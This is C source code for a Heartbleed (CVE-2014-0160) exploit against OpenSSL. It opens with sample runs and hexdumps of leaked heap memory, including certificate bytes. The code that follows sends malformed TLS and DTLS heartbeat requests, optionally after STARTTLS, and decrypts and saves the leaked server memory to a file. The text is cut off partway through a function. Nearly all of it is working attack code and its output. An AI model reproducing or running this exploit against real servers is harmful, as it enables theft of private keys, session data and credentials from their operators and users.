heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\r\n* [ =============================================================\r\n* [ <3 <3 <3 heart bleed <3 <3 <3\r\n* [ heartbeat returned type=24 length=1392\r\n* [ decrypting SSL packet\r\n* [ heartbleed leaked length=1336\r\n* [ final record type=24, length=1355\r\n* [ wrote 1352 bytes of heap to file 'eshta'\r\n*\r\n*\r\n* # hexdump -C eshta\r\n* 00000000 00 00 00 00 06 30 f1 95 08 00 00 00 00 00 00 00 |.....0..........|\r\n* 00000010 8c 43 64 ab e3 89 6b fd e3 d3 74 a1 a1 31 8c 35 |.Cd...k...t..1.5|\r\n* 00000020 09 6d b9 e7 08 08 08 08 08 08 08 08 08 a1 65 9f |.m............e.|\r\n* 00000030 ca 13 80 7c a5 88 b0 c9 d5 f6 7b 14 fe ff 00 00 |...|......{.....|\r\n* 00000040 00 00 00 00 00 03 00 01 01 16 fe ff 00 01 00 00 |................|\r\n* 00000050 00 00 00 00 00 40 b5 fd a5 10 da c4 fd fb c7 d2 |[email\u00a0protected]|\r\n* 00000060 9f 0c 56 4b a9 9c 14 00 00 0c 00 03 00 00 00 00 |..VK............|\r\n* 00000070 00 0c 69 ec c4 d5 f3 38 ae e5 2e 3a 1a 32 f9 30 |..i....8...:.2.0|\r\n* 00000080 7f 61 4c 8c d7 34 f3 02 08 3f 68 01 a9 a7 81 55 |.aL..4...?h....U|\r\n* 00000090 01 c9 03 03 03 03 00 00 0e 31 39 32 2e 31 36 38 |.........192.168|\r\n* 000000a0 2e 37 35 2e 32 33 35 00 23 00 00 00 0f 00 01 01 |.75.235.#.......|\r\n* 000000b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n*\r\n* 00000530 00 00 00 00 00 00 00 00 a5 e2 f5 67 d6 23 85 49 |...........g.#.I|\r\n* 00000540 b3 cc ed c4 d2 74 c8 97 c1 b4 cc |.....t.....|\r\n* 0000054b\r\n*\r\n*\r\n* # openssl s_client -connect localhost:990 -dtls1\r\n* ...\r\n* # ./heartbleed -b localhost -p 990 -u -t 1 -f eshta\r\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\r\n* [ =============================================================\r\n* [ SSL connection using AES256-SHA\r\n* [ <3 <3 <3 heart bleed <3 <3 <3\r\n* [ heartbeat returned type=24 length=1392\r\n* [ decrypting SSL packet\r\n* [ heartbleed leaked length=1336\r\n* [ final record type=24, length=1355\r\n* [ wrote 1352 bytes of heap to file 'eshta'\r\n*\r\n*\r\n* # hexdump -C eshta\r\n* 00000000 00 00 24 4e b7 00 00 00 00 00 00 00 00 18 00 00 |..$N............|\r\n* 00000010 cf d0 5f df c3 64 5f 58 79 17 f8 f7 22 9b 28 6e |.._..d_Xy...\".(n|\r\n* 00000020 c0 e7 d6 a3 08 08 08 08 08 08 08 08 08 9b c3 38 |...............8|\r\n* 00000030 2b 32 5f dd 3a d5 0f 83 51 02 2f 70 33 8f cf 82 |+2_.:...Q./p3...|\r\n* 00000040 21 5b cc 25 80 26 f3 29 c8 90 91 ec 5c 83 68 ee |![.%.&.)....\\.h.|\r\n* 00000050 6b 11 0d ad f1 f4 da 9e 13 59 8f 2a 74 f6 d4 35 |k........Y.*t..5|\r\n* 00000060 9e 17 12 7c 2b 6f 9e a8 1e b4 7a 3c a5 ec 18 e0 |...|+o....z<....|\r\n* 00000070 44 b2 51 e4 69 8c 47 29 39 fb 9e b0 dd 5b 05 4d |D.Q.i.G)9....[.M|\r\n* 00000080 db 11 06 7b 1d 08 58 60 ac 34 3f 2d d1 14 c1 b7 |...{..X`.4?-....|\r\n* 00000090 d5 08 59 73 16 28 f8 75 23 f7 85 27 48 be 1f 14 |..Ys.(.u#..'H...|\r\n* 000000a0 fe ff 00 00 00 00 00 00 00 04 00 01 01 16 fe ff |................|\r\n* 000000b0 00 01 00 00 00 00 00 00 00 40 62 1c 02 19 45 5f |[email\u00a0protected]_|\r\n* 000000c0 2c a6 89 95 d2 bf 16 c4 8b b7 14 00 00 0c 00 04 |,...............|\r\n* 000000d0 00 00 00 00 00 0c e9 fb 75 02 61 90 be 4d f7 82 |........u.a..M..|\r\n* 000000e0 06 d6 fd 6d 53 a1 d5 44 e0 5a 0d 6a 6a 94 ef e8 |...mS..D.Z.jj...|\r\n* 000000f0 4c 01 4b cb 86 73 03 03 03 03 2d 53 74 61 74 65 |L.K..s....-State|\r\n* 00000100 31 21 30 1f 06 03 55 04 0a 0c 18 49 6e 74 65 72 |1!0...U....Inter|\r\n* 00000110 6e 65 74 20 57 69 64 67 69 74 73 20 50 74 79 20 |net Widgits Pty |\r\n* 00000120 4c 74 64 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 |Ltd0..\"0...*.H..|\r\n* 00000130 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 |...........0....|\r\n* 00000140 82 01 01 00 c0 85 26 4a 9d cd f8 5e 46 74 fa 89 |......&J...^Ft..|\r\n* 00000150 e3 7d 58 76 23 ba ba dc b1 35 98 35 a5 ba 53 a1 |.}Xv#....5.5..S.|\r\n* 00000160 5b 37 28 fe f7 d0 02 fc fd c9 e3 b1 ee e6 fe 79 |[7(............y|\r\n* 00000170 86 f8 81 1a 29 29 a9 81 95 1c c9 5c 81 a2 e8 0c |....)).....\\....|\r\n* 00000180 35 b7 cb 67 8a ec 2a d1 73 e6 70 78 53 c8 50 91 |5..g..*.s.pxS.P.|\r\n* 00000190 49 07 db e1 a4 08 7b fb 07 54 48 85 45 c2 38 71 |I.....{..TH.E.8q|\r\n* 000001a0 6a 8a f2 4d a7 ba 1a 86 36 a2 ae bb a1 e1 7c 2c |j..M....6.....|,|\r\n* 000001b0 12 04 ce e5 d1 75 24 94 1c 31 2c 46 b7 76 30 3a |.....u$..1,F.v0:|\r\n* 000001c0 04 79 2f b3 65 74 fb ae c7 10 a5 da a8 2d b6 fd |.y/.et.......-..|\r\n* 000001d0 cf f9 11 fe 38 cd 25 7e 13 75 14 1d 58 92 bb 3f |....8.%~.u..X..?|\r\n* 000001e0 8f 75 d5 52 f7 27 66 ca 5d 55 4d 0a b5 71 a2 16 |.u.R.'f.]UM..q..|\r\n* 000001f0 3e 01 af 97 93 eb 5c 3f e0 fa c8 61 2c a1 87 8f |>.....\\?...a,...|\r\n* 00000200 60 d4 df 5d 9d cd 0f 34 a9 66 6c 93 d8 5f 4a 2b |`..]...4.fl.._J+|\r\n* 00000210 fd 67 3a 2f 88 90 b4 e9 f5 d6 ee bb 7d 8b 1c e5 |.g:/........}...|\r\n* 00000220 f2 cc 4f b2 c0 dc e8 1b 4c 6e 51 c9 47 8b 6c 82 |..O.....LnQ.G.l.|\r\n* 00000230 f9 4b ae 01 a8 f9 6c 6d d5 1a d5 cf 63 f4 7f e0 |.K....lm....c...|\r\n* 00000240 96 54 3f 7d 02 03 01 00 01 a3 50 30 4e 30 1d 06 |.T?}......P0N0..|\r\n* 00000250 03 55 1d 0e 04 16 04 14 af 97 4e 87 62 8a 77 b8 |.U........N.b.w.|\r\n* 00000260 b4 0b 24 20 35 b1 66 09 55 3f 74 1d 30 1f 06 03 |..$ 5.f.U?t.0...|\r\n* 00000270 55 1d 23 04 18 30 16 80 14 af 97 4e 87 62 8a 77 |U.#..0.....N.b.w|\r\n* 00000280 b8 b4 0b 24 20 35 b1 66 09 55 3f 74 1d 30 0c 06 |...$ 5.f.U?t.0..|\r\n* 00000290 03 55 1d 13 04 05 30 03 01 01 ff 30 0d 06 09 2a |.U....0....0...*|\r\n* 000002a0 86 48 86 f7 0d 01 01 05 05 00 03 82 01 01 00 b0 |.H..............|\r\n* 000002b0 8e 40 58 2d 86 32 95 11 a7 a1 64 1d fc 08 8d 87 |[email\u00a0protected]|\r\n* 000002c0 18 d3 5d c6 a0 bb 84 4a 50 f5 27 1c 15 4b 02 0c |..]....JP.'..K..|\r\n* 000002d0 49 1f 2d 0a 52 d3 98 6b 71 3d b9 0f 36 24 d3 77 |I.-.R..kq=..6$.w|\r\n* 000002e0 e0 d0 a5 50 e5 ea 2d 67 11 69 4d 45 52 97 4d 58 |...P..-g.iMER.MX|\r\n* 000002f0 de 22 06 02 6d 21 80 2f 0d 1c d5 d5 80 5c 8f 44 |.\"..m!./.....\\.D|\r\n* 00000300 1e b6 f3 41 4c dc d3 40 8d 54 ac b0 ca 8f 19 6a |[email\u00a0protected]|\r\n* 00000310 4d f2 fb ad 68 5a 99 19 ca ae b2 f5 54 70 29 96 |M...hZ......Tp).|\r\n* 00000320 84 7e ba a9 6b 42 e6 68 32 dc 65 87 b1 b7 17 22 |.~..kB.h2.e....\"|\r\n* 00000330 e3 cc 62 97 e4 fa 64 0b 1e 70 bf e5 a2 40 e4 49 |[email\u00a0protected]|\r\n* 00000340 24 f9 05 3f 2e fe 7c 38 56 39 4d bd 51 63 0d 79 |$..?..|8V9M.Qc.y|\r\n* 00000350 85 c0 4b 1a 46 64 e0 fe a8 87 bf c7 4d 21 cb 79 |..K.Fd......M!.y|\r\n* 00000360 37 e7 a6 e3 6c 3b ed 35 17 73 7a 71 c6 72 2f bb |7...l;.5.szq.r/.|\r\n* 00000370 58 dc ef e9 1e a3 89 5e 70 cd 95 10 87 c1 8a 7e |X......^p......~|\r\n* 00000380 e7 51 c2 22 67 66 ee 22 f9 a5 2e 31 f2 ad fc 3b |.Q.\"gf.\"...1...;|\r\n* 00000390 98 c8 30 63 ef 74 b5 4e c4 bd c7 a2 46 0a b8 bf |..0c.t.N....F...|\r\n* 000003a0 df a8 54 0e 4f 37 d0 a5 27 a3 f3 a7 28 38 3f 16 |..T.O7..'...(8?.|\r\n* 000003b0 fe ff 00 00 00 00 00 00 00 02 00 0c 0e 00 00 00 |................|\r\n* 000003c0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n* 000003d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n* *\r\n* 00000530 00 00 00 00 00 00 00 00 82 8f be ff cf 26 12 9d |.............&..|\r\n* 00000540 a2 de 0c 44 21 4a 54 be 41 4c df |...D!JT.AL.|\r\n* 0000054b\r\n*\r\n*/\r\n#include <stdio.h>\r\n#include <stdint.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <getopt.h>\r\n#include <signal.h>\r\n#include <netdb.h>\r\n#include <fcntl.h>\r\n#include <errno.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <netinet/in.h>\r\n#include <inttypes.h>\r\n#include <openssl/bio.h>\r\n#include <openssl/ssl.h>\r\n#include <openssl/err.h>\r\n#include <openssl/evp.h>\r\n#include <openssl/tls1.h>\r\n#include <openssl/rand.h>\r\n#include <openssl/buffer.h>\r\n \r\n#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \\\r\n (((unsigned int)(c[1])) )),c+=2)\r\n#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \\\r\n c[1]=(unsigned char)(((s) )&0xff)),c+=2)\r\n \r\nint first = 0;\r\nint leakbytes = 0;\r\nint repeat = 1;\r\nint badpackets = 0;\r\n \r\ntypedef struct {\r\n int socket;\r\n SSL *sslHandle;\r\n SSL_CTX *sslContext;\r\n} connection;\r\n \r\ntypedef struct {\r\n unsigned char type;\r\n short version;\r\n unsigned int length;\r\n unsigned char hbtype;\r\n unsigned int payload_length;\r\n void* payload;\r\n} heartbeat;\r\n \r\nvoid ssl_init();\r\nvoid usage();\r\nint tcp_connect(char*,int);\r\nint tcp_bind(char*, int);\r\nconnection* tls_connect(int);\r\nconnection* tls_bind(int);\r\nint pre_cmd(int,int,int);\r\nvoid* heartbleed(connection* ,unsigned int);\r\nvoid* sneakyleaky(connection* ,char*, int);\r\n \r\nstatic DTLS1_BITMAP *dtls1_get_bitmap(SSL *s, SSL3_RECORD *rr, unsigned int *is_next_epoch);\r\nstatic int dtls1_record_replay_check(SSL *s, DTLS1_BITMAP *bitmap);\r\nstatic int dtls1_buffer_record(SSL *s, record_pqueue *q, unsigned char *priority);\r\nstatic void dtls1_record_bitmap_update(SSL *s, DTLS1_BITMAP *bitmap);\r\n \r\nint tcp_connect(char* server,int port){\r\n int sd,ret;\r\n struct hostent *host;\r\n struct sockaddr_in sa;\r\n host = gethostbyname(server);\r\n sd = socket(AF_INET, SOCK_STREAM, 0);\r\n if(sd==-1){\r\n printf(\"[!] cannot create socket\\n\");\r\n exit(0);\r\n }\r\n sa.sin_family = AF_INET;\r\n sa.sin_port = htons(port);\r\n sa.sin_addr = *((struct in_addr *) host->h_addr);\r\n bzero(&(sa.sin_zero),8);\r\n printf(\"[ connecting to %s %d/tcp\\n\",server,port);\r\n ret = connect(sd,(struct sockaddr *)&sa, sizeof(struct sockaddr));\r\n if(ret==0){\r\n printf(\"[ connected to %s %d/tcp\\n\",server,port);\r\n }\r\n else{\r\n printf(\"[!] FATAL: could not connect to %s %d/tcp\\n\",server,port);\r\n exit(0);\r\n }\r\n return sd;\r\n}\r\n \r\nint tcp_bind(char* server, int port){\r\n int sd, ret, val=1;\r\n struct sockaddr_in sin;\r\n struct hostent *host;\r\n host = gethostbyname(server);\r\n sd=socket(AF_INET,SOCK_STREAM,0);\r\n if(sd==-1){\r\n printf(\"[!] cannot create socket\\n\");\r\n exit(0);\r\n }\r\n memset(&sin,0,sizeof(sin));\r\n sin.sin_addr=*((struct in_addr *) host->h_addr);\r\n sin.sin_family=AF_INET;\r\n sin.sin_port=htons(port);\r\n setsockopt(sd,SOL_SOCKET,SO_REUSEADDR,&val,sizeof(val));\r\n ret = bind(sd,(struct sockaddr *)&sin,sizeof(sin));\r\n if(ret==-1){\r\n printf(\"[!] cannot bind socket\\n\");\r\n exit(0);\r\n }\r\n listen(sd,5);\r\n return(sd);\r\n}\r\n \r\nconnection* dtls_server(int sd, char* server,int port){\r\n int bytes;\r\n connection *c;\r\n char* buf;\r\n buf = malloc(4096);\r\n int ret;\r\n struct hostent *host;\r\n struct sockaddr_in sa;\r\n unsigned long addr;\r\n if ((host = gethostbyname(server)) == NULL) {\r\n perror(\"gethostbyname\");\r\n exit(1);\r\n }\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd==-1){\r\n printf(\"[!] cannot create socket\\n\");\r\n exit(0);\r\n }\r\n sa.sin_family = AF_INET;\r\n sa.sin_port = htons(port);\r\n sa.sin_addr = *((struct in_addr *) host->h_addr);\r\n if (bind(sd, (struct sockaddr *) &sa ,sizeof(struct sockaddr_in)) < 0) {\r\n perror(\"bind()\");\r\n exit(1);\r\n }\r\n \r\n BIO *bio;\r\n if(c==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n if(buf==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n memset(buf,0,4096);\r\n c = malloc(sizeof(connection));\r\n if(c==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n c->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(DTLSv1_server_method());\r\n SSL_CTX_set_read_ahead (c->sslContext, 1);\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n SSL_CTX_SRP_CTX_init(c->sslContext);\r\n SSL_CTX_use_certificate_file(c->sslContext, \"./server.crt\", SSL_FILETYPE_PEM);\r\n SSL_CTX_use_PrivateKey_file(c->sslContext, \"./server.key\", SSL_FILETYPE_PEM); \r\n if(!SSL_CTX_check_private_key(c->sslContext)){\r\n printf(\"[!] FATAL: private key does not match the certificate public key\\n\");\r\n exit(0);\r\n }\r\n c->sslHandle = SSL_new(c->sslContext);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(!SSL_set_fd(c->sslHandle,c->socket))\r\n ERR_print_errors_fp(stderr);\r\n bio = BIO_new_dgram(sd, BIO_NOCLOSE);\r\n \r\n SSL_set_bio(c->sslHandle, bio, bio);\r\n SSL_set_accept_state (c->sslHandle);\r\n \r\n int rc = SSL_accept(c->sslHandle);\r\n printf (\"[ SSL connection using %s\\n\", SSL_get_cipher (c->sslHandle));\r\n// bytes = SSL_read(c->sslHandle, buf, 4095);\r\n// printf(\"[ recieved: %d bytes - showing output\\n%s\\n[\\n\",bytes,buf);\r\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf(\"[ warning: heartbeat extension is unsupported (try anyway)\\n\");\r\n }\r\n return c;\r\n}\r\n \r\nvoid ssl_init(){\r\n SSL_load_error_strings();\r\n SSL_library_init();\r\n OpenSSL_add_all_digests();\r\n OpenSSL_add_all_algorithms();\r\n OpenSSL_add_all_ciphers();\r\n}\r\n \r\nconnection* tls_connect(int sd){\r\n connection *c;\r\n c = malloc(sizeof(connection));\r\n if(c==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n c->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(SSLv23_client_method());\r\n SSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n c->sslHandle = SSL_new(c->sslContext);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(!SSL_set_fd(c->sslHandle,c->socket))\r\n ERR_print_errors_fp(stderr);\r\n if(SSL_connect(c->sslHandle)!=1)\r\n ERR_print_errors_fp(stderr);\r\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf(\"[ warning: heartbeat extension is unsupported (try anyway)\\n\");\r\n }\r\n return c;\r\n}\r\n \r\nconnection* dtls_client(int sd, char* server,int port){\r\n int ret;\r\n struct hostent *host;\r\n struct sockaddr_in sa;\r\n connection *c;\r\n memset((char *)&sa,0,sizeof(sa));\r\n c = malloc(sizeof(connection));\r\n if ((host = gethostbyname(server)) == NULL) {\r\n perror(\"gethostbyname\");\r\n exit(1);\r\n }\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd==-1){\r\n printf(\"[!] cannot create socket\\n\");\r\n exit(0);\r\n }\r\n sa.sin_family = AF_INET;\r\n sa.sin_port = htons(port);\r\n sa.sin_addr = *((struct in_addr *) host->h_addr);\r\n if (connect(sd, (struct sockaddr *) &sa ,sizeof(struct sockaddr_in)) < 0) {\r\n perror(\"connect()\");\r\n exit(0);\r\n }\r\n \r\n BIO *bio;\r\n if(c==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n \r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(DTLSv1_client_method());\r\n SSL_CTX_set_read_ahead (c->sslContext, 1);\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n \r\n c->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslHandle = SSL_new(c->sslContext);\r\n SSL_set_tlsext_host_name(c->sslHandle,server);\r\n bio = BIO_new_dgram(sd, BIO_NOCLOSE);\r\n \r\n BIO_ctrl_set_connected(bio, 1, &sa);\r\n SSL_set_bio(c->sslHandle, bio, bio);\r\n SSL_set_connect_state (c->sslHandle);\r\n//printf(\"eshta\\n\");\r\n if(SSL_connect(c->sslHandle)!=1)\r\n ERR_print_errors_fp(stderr);\r\n \r\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf(\"[ warning: heartbeat extension is unsupported (try anyway), %d \\n\",c->sslHandle->tlsext_heartbeat);\r\n }\r\n return c;\r\n}\r\n \r\nconnection* tls_bind(int sd){\r\n int bytes;\r\n connection *c;\r\n char* buf;\r\n buf = malloc(4096);\r\n if(buf==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n memset(buf,0,4096);\r\n c = malloc(sizeof(connection));\r\n if(c==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n c->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(SSLv23_server_method());\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n SSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);\r\n SSL_CTX_SRP_CTX_init(c->sslContext);\r\n SSL_CTX_use_certificate_file(c->sslContext, \"./server.crt\", SSL_FILETYPE_PEM);\r\n SSL_CTX_use_PrivateKey_file(c->sslContext, \"./server.key\", SSL_FILETYPE_PEM); \r\n if(!SSL_CTX_check_private_key(c->sslContext)){\r\n printf(\"[!] FATAL: private key does not match the certificate public key\\n\");\r\n exit(0);\r\n }\r\n c->sslHandle = SSL_new(c->sslContext);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(!SSL_set_fd(c->sslHandle,c->socket))\r\n ERR_print_errors_fp(stderr);\r\n int rc = SSL_accept(c->sslHandle);\r\n printf (\"[ SSL connection using %s\\n\", SSL_get_cipher (c->sslHandle));\r\n bytes = SSL_read(c->sslHandle, buf, 4095);\r\n printf(\"[ recieved: %d bytes - showing output\\n%s\\n[\\n\",bytes,buf);\r\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf(\"[ warning: heartbeat extension is unsupported (try anyway)\\n\");\r\n }\r\n return c;\r\n}\r\n \r\nint pre_cmd(int sd,int precmd,int verbose){\r\n /* this function can be used to send commands to a plain-text\r\n service or client before heartbleed exploit attempt. e.g. STARTTLS */\r\n int rc, go = 0;\r\n char* buffer;\r\n char* line1;\r\n char* line2; \r\n switch(precmd){\r\n case 0:\r\n line1 = \"EHLO test\\n\";\r\n line2 = \"STARTTLS\\n\";\r\n break;\r\n case 1:\r\n line1 = \"CAPA\\n\";\r\n line2 = \"STLS\\n\";\r\n break;\r\n case 2:\r\n line1 = \"a001 CAPB\\n\";\r\n line2 = \"a002 STARTTLS\\n\";\r\n break;\r\n default:\r\n go = 1;\r\n break;\r\n }\r\n if(go==0){\r\n buffer = malloc(2049);\r\n if(buffer==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n memset(buffer,0,2049);\r\n rc = read(sd,buffer,2048);\r\n printf(\"[ banner: %s\",buffer);\r\n send(sd,line1,strlen(line1),0);\r\n memset(buffer,0,2049);\r\n rc = read(sd,buffer,2048);\r\n if(verbose==1){\r\n printf(\"%s\\n\",buffer);\r\n }\r\n send(sd,line2,strlen(line2),0);\r\n memset(buffer,0,2049);\r\n rc = read(sd,buffer,2048);\r\n if(verbose==1){\r\n printf(\"%s\\n\",buffer);\r\n }\r\n }\r\n return sd;\r\n}\r\n \r\nvoid* heartbleed(connection *c,unsigned int type){\r\n unsigned char *buf, *p;\r\n int ret;\r\n buf = OPENSSL_malloc(1 + 2);\r\n if(buf==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n p = buf;\r\n *p++ = TLS1_HB_REQUEST;\r\n switch(type){\r\n case 0:\r\n s2n(0x0,p);\r\n break;\r\n case 1:\r\n s2n(0xffff,p);\r\n break;\r\n default:\r\n printf(\"[ setting heartbeat payload_length to %u\\n\",type);\r\n s2n(type,p);\r\n break;\r\n }\r\n printf(\"[ <3 <3 <3 heart bleed <3 <3 <3\\n\");\r\n ret = ssl3_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3);\r\n OPENSSL_free(buf);\r\n return c;\r\n}\r\n \r\nvoid* dtlsheartbleed(connection *c,unsigned int type){\r\n \r\n unsigned char *buf, *p;\r\n int ret;\r\n buf = OPENSSL_malloc(1 + 2 + 16);\r\n memset(buf, '\\0', sizeof buf);\r\n if(buf==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n p = buf;\r\n *p++ = TLS1_HB_REQUEST;\r\n switch(type){\r\n case 0:\r\n s2n(0x0,p);\r\n break;\r\n case 1:\r\n// s2n(0xffff,p);\r\n// s2n(0x3feb,p);\r\n s2n(0x0538,p);\r\n break;\r\n default:\r\n printf(\"[ setting heartbeat payload_length to %u\\n\",type);\r\n s2n(type,p);\r\n break;\r\n }\r\n s2n(c->sslHandle->tlsext_hb_seq, p);\r\n printf(\"[ <3 <3 <3 heart bleed <3 <3 <3\\n\");\r\n \r\n ret = dtls1_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3 + 16);\r\n \r\n if (ret >= 0)\r\n {\r\n if (c->sslHandle->msg_callback)\r\n c->sslHandle->msg_callback(1, c->sslHandle->version, TLS1_RT_HEARTBEAT,\r\n buf, 3 + 16,\r\n c->sslHandle, c->sslHandle->msg_callback_arg);\r\n \r\n dtls1_start_timer(c->sslHandle);\r\n c->sslHandle->tlsext_hb_pending = 1;\r\n }\r\n \r\n OPENSSL_free(buf);\r\n \r\n return c;\r\n}\r\n \r\nvoid* sneakyleaky(connection *c,char* filename, int verbose){\r\n char *p;\r\n int ssl_major,ssl_minor,al;\r\n int enc_err,n,i;\r\n SSL3_RECORD *rr;\r\n SSL_SESSION *sess;\r\n SSL* s;\r\n unsigned char md[EVP_MAX_MD_SIZE];\r\n short version;\r\n unsigned mac_size, orig_len;\r\n size_t extra;\r\n rr= &(c->sslHandle->s3->rrec);\r\n sess=c->sslHandle->session;\r\n s = c->sslHandle;\r\n if (c->sslHandle->options & SSL_OP_MICROSOFT_BIG_SSLV3_BUFFER)\r\n extra=SSL3_RT_MAX_EXTRA;\r\n else\r\n extra=0;\r\n if ((s->rstate != SSL_ST_READ_BODY) ||\r\n (s->packet_length < SSL3_RT_HEADER_LENGTH)) {\r\n n=ssl3_read_n(s, SSL3_RT_HEADER_LENGTH, s->s3->rbuf.len, 0);\r\n if (n <= 0)\r\n goto apple;\r\n s->rstate=SSL_ST_READ_BODY;\r\n p=s->packet;\r\n rr->type= *(p++);\r\n ssl_major= *(p++);\r\n ssl_minor= *(p++);\r\n version=(ssl_major<<8)|ssl_minor;\r\n n2s(p,rr->length);\r\n if(rr->type==24){\r\n printf(\"[ heartbeat returned type=%d length=%u\\n\",rr->type, rr->length);\r\n if(rr->length > 16834){\r\n printf(\"[ error: got a malformed TLS length.\\n\");\r\n exit(0);\r\n }\r\n }\r\n else{\r\n printf(\"[ incorrect record type=%d length=%u returned\\n\",rr->type,rr->length);\r\n s->packet_length=0;\r\n badpackets++;\r\n if(badpackets > 3){\r\n printf(\"[ error: too many bad packets recieved\\n\");\r\n exit(0);\r\n }\r\n goto apple;\r\n }\r\n }\r\n if (rr->length > s->packet_length-SSL3_RT_HEADER_LENGTH){\r\n i=rr->length;\r\n n=ssl3_read_n(s,i,i,1);\r\n if (n <= 0) goto apple;\r\n }\r\n printf(\"[ decrypting SSL packet\\n\");\r\n s->rstate=SSL_ST_READ_HEADER;\r\n rr->input= &(s->packet[SSL3_RT_HEADER_LENGTH]);\r\n rr->data=rr->input;\r\n tls1_enc(s,0);\r\n if((sess != NULL) &&\r\n (s->enc_read_ctx != NULL) &&\r\n (EVP_MD_CTX_md(s->read_hash) != NULL))\r\n {\r\n unsigned char *mac = NULL;\r\n unsigned char mac_tmp[EVP_MAX_MD_SIZE];\r\n mac_size=EVP_MD_CTX_size(s->read_hash);\r\n OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE);\r\n orig_len = rr->length+((unsigned int)rr->type>>8);\r\n if(orig_len < mac_size ||\r\n (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE &&\r\n orig_len < mac_size+1)){\r\n al=SSL_AD_DECODE_ERROR;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT);\r\n }\r\n if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){\r\n mac = mac_tmp;\r\n ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);\r\n rr->length -= mac_size;\r\n }\r\n else{\r\n rr->length -= mac_size;\r\n mac = &rr->data[rr->length];\r\n }\r\n i = tls1_mac(s,md,0);\r\n if (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0)\r\n enc_err = -1;\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra+mac_size)\r\n enc_err = -1;\r\n }\r\n if(enc_err < 0){\r\n al=SSL_AD_BAD_RECORD_MAC;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC);\r\n goto apple;\r\n }\r\n if(s->expand != NULL){\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n if (!ssl3_do_uncompress(s)) {\r\n al=SSL_AD_DECOMPRESSION_FAILURE;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION);\r\n goto 